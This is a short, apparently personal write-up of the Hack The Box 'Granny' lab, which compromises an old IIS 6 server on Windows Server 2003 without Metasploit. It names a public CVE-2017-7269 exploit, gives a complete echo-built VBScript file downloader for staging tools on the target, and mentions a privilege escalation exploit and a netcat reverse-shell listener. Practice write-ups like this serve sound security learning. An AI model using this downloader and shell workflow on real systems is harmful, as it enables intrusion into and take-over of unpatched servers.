Hack the box granny seems to be the same age as grandpa. windows server 2003 with same settings. I did try to make things a bit different on privilege escalation part. tried for an hour got lazy so dropped it and followed the same path as grandpa. But hey I still didn’t use metasploit so that’s a good thing
Time to start with nmap
IIS was vulnerable . So we will just attack that one using the exploit found here: https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
since we have a stable shell first I thought we will use exploit suggester and see if there is something we can exploit with. And there was no luck nothing at all. back the drawing board. downloaded the vbs script
echo strUrl = WScript.Arguments.Item(0) > wget.vbs echo StrFile = WScript.Arguments.Item(1) >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs echo Next >> wget.vbs echo ts.Close >> wget.vbs
downloaded all the necessary files using vbs script
as you can see I have tried running MS-14-058 but it didn’t work or maybe cause I’m still a noob can’t find a way to run it. After downloading all the files ran the exploit and got a administrative shell
Dont forget to keep the netcat runnung with port 4443.
Be First to Comment